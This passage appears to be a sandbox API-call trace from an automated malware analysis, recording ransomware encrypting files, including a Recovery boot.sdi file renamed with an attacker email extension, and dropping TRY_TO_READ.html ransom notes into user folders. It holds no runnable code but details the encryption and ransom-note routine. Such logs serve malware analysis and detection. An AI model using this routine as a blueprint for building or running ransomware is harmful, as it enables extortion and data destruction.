lpOverlapped=0x0) returned 1 [0116.776] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.776] WriteFile (in: hFile=0x460, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.776] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.776] ReadFile (in: hFile=0x460, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.788] SetFilePointer (in: hFile=0x460, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000 [0116.788] WriteFile (in: hFile=0x460, lpBuffer=0x31e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.791] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.791] WriteFile (in: hFile=0x460, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.791] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.791] ReadFile (in: hFile=0x460, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.803] SetFilePointer (in: hFile=0x460, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000 [0116.803] WriteFile (in: hFile=0x460, lpBuffer=0x31e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.806] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.806] WriteFile (in: hFile=0x460, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.806] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.806] ReadFile (in: hFile=0x460, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.823] SetFilePointer (in: hFile=0x460, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000 [0116.823] WriteFile (in: hFile=0x460, lpBuffer=0x31e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.825] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.825] WriteFile (in: hFile=0x460, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.825] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.826] ReadFile (in: hFile=0x460, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.829] SetFilePointer (in: hFile=0x460, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000 [0116.829] WriteFile (in: hFile=0x460, lpBuffer=0x31e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.832] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.832] WriteFile (in: hFile=0x460, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.832] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.832] ReadFile (in: hFile=0x460, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.843] SetFilePointer (in: hFile=0x460, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000 [0116.843] WriteFile (in: hFile=0x460, lpBuffer=0x31e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.845] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.845] WriteFile (in: hFile=0x460, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.845] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.845] ReadFile (in: hFile=0x460, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.858] SetFilePointer (in: hFile=0x460, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000 [0116.858] WriteFile (in: hFile=0x460, lpBuffer=0x31e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.861] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.861] WriteFile (in: hFile=0x460, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.861] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.861] ReadFile (in: hFile=0x460, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.870] SetFilePointer (in: hFile=0x460, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000 [0116.870] WriteFile (in: hFile=0x460, lpBuffer=0x31e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0116.873] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xa16011a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.873] WriteFile (in: hFile=0x460, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.873] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0020 | out: hHeap=0x2e0000) returned 1 [0116.878] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31e0020 | out: hHeap=0x2e0000) returned 1 [0116.882] CloseHandle (hObject=0x460) returned 1 [0117.170] GetProcessHeap () returned 0x2e0000 [0117.170] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363420 | out: hHeap=0x2e0000) returned 1 [0117.170] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363318 | out: hHeap=0x2e0000) returned 1 [0117.170] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.170] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329458 | out: hHeap=0x2e0000) returned 1 [0117.170] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.170] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3293d0 [0117.170] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363318 [0117.170] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0117.170] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363318 | out: pbBuffer=0x363318) returned 1 [0117.171] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330c38 | out: pbBuffer=0x330c38) returned 1 [0117.171] SetFileAttributesW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", dwFileAttributes=0x80) returned 1 [0117.171] lstrlenW (lpString="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 58 [0117.171] GetProcessHeap () returned 0x2e0000 [0117.171] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xda) returned 0x383d58 [0117.171] lstrcpyW (in: lpString1=0x383d58, lpString2="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" [0117.171] lstrcatW (in: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.AIR" [0117.171] MoveFileExW (lpExistingFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0117.174] CreateFileW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0117.174] GetProcessHeap () returned 0x2e0000 [0117.174] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d58 | out: hHeap=0x2e0000) returned 1 [0117.174] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=3170304) returned 1 [0117.174] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x306000 [0117.174] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0117.174] GetProcessHeap () returned 0x2e0000 [0117.174] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363420 [0117.174] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363420*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363420*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0117.174] WriteFile (in: hFile=0x460, lpBuffer=0x363420*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363420*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0117.175] WriteFile (in: hFile=0x460, lpBuffer=0x330c38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330c38*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0117.175] WriteFile (in: hFile=0x460, lpBuffer=0x330c38*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330c38*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0117.175] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x306000) returned 0x30d0020 [0117.176] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x306000) returned 0x33e0020 [0117.176] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.176] ReadFile (in: hFile=0x460, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x306000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x306000, lpOverlapped=0x0) returned 1 [0117.361] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35dd58 [0117.362] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.362] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.362] GetLastError () returned 0x0 [0117.362] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x970a00b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970a00b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0117.362] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.362] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.362] GetLastError () returned 0x0 [0117.362] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0117.362] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.362] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.362] GetLastError () returned 0x0 [0117.362] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.362] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.363] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.363] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.364] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.364] CloseHandle (hObject=0x464) returned 1 [0117.364] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.364] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.364] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.364] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324c48 | out: hHeap=0x2e0000) returned 1 [0117.364] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0117.364] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.364] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.364] GetLastError () returned 0x0 [0117.364] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.365] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0117.365] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.366] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.366] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.366] CloseHandle (hObject=0x464) returned 1 [0117.367] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.367] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.367] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.367] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0117.367] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0117.367] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.367] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.367] GetLastError () returned 0x0 [0117.367] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.367] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.367] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.368] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.368] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.368] CloseHandle (hObject=0x464) returned 1 [0117.368] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.369] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.369] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.369] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324ca0 | out: hHeap=0x2e0000) returned 1 [0117.369] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0117.369] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.369] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.369] GetLastError () returned 0x0 [0117.369] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, 